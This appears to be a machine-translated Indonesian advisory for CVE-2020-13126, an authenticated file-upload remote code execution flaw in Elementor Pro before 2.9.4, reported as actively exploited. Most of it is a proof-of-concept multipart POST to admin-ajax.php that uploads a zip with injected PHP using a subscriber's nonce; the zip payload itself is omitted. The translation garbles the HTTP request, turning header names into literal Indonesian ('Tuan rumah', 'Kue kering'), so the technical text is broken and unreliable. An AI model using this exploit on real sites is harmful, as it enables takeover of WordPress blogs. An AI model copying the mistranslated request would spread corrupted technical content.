Elementor Pro < 2.9.4 - Unggah File Sewenang-wenang RCE (Remote Code Execution) yang Diautentikasi
Kerentanan, yang saat ini dieksploitasi oleh penyerang, memungkinkan setiap pengguna yang masuk untuk mengunggah dan menjalankan skrip PHP di blog dan bahwa ini mempengaruhi plugin Element Pro, bukan versi gratis(free)
Kerentanan ini digunakan bersama dengan kerentanan di Ultimate Addons for Elementor yang memungkinkan pendaftaran pelanggan.
BUKTI KONSEP
Berikut ini adalah contoh posting di mana zip_upload dapat berisi file zip yang dihasilkan fontello dengan file php yang disuntikkan. Nonce yang sah dapat diambil dari sumber halaman /wp-admin setelah diautentikasi sebagai pelanggan untuk bidang _nonce.
POST /wp-admin/admin-ajax.php HTTP/1.1
Tuan rumah:
Konten-Panjang: 38005
Terima: aplikasi/json, teks/javascript, */*; q=0,01
X-Diminta-Dengan: XMLHttpRequest
Agen-Pengguna: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/81.0.4044.113 Safari/537.36
Content-Type: multipart/form-data; batas=----WebKitFormBoundaryczB4AfBdfz6AZDaF
Asal: http://elementorvuln.vhx.cloud:8080
Referensi: [url]/wp-admin/post-new.php?post_type=elementor_icons
Terima-Encoding: gzip, deflate
Bahasa Terima: en-US,en;q=0.9
Kue kering:
Koneksi: tutup
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Isi-Disposisi: formulir-data; nama="zip_upload"; nama file="fontello-c6dc39d0.zip"
Tipe Konten: aplikasi/zip
**menghilangkan ini untuk singkatnya***
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Isi-Disposisi: formulir-data; nama="tindakan"
{"pro_assets_manager_custom_icon_upload":{"action":"pro_assets_manager_custom_icon_upload","data":{"post_id":"1"}}}
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Isi-Disposisi: formulir-data; nama="_nonce"
5052d6f053
------WebKitFormBoundaryczB4AfBdfz6AZDaF
Isi-Disposisi: formulir-data; nama = "tindakan"
elementor_ajax
------WebKitFormBoundaryczB4AfBdfz6AZDaF———
Klasifikasi
JenisRCE
10 besar OWASPCVE-2020-13126
0 Komentar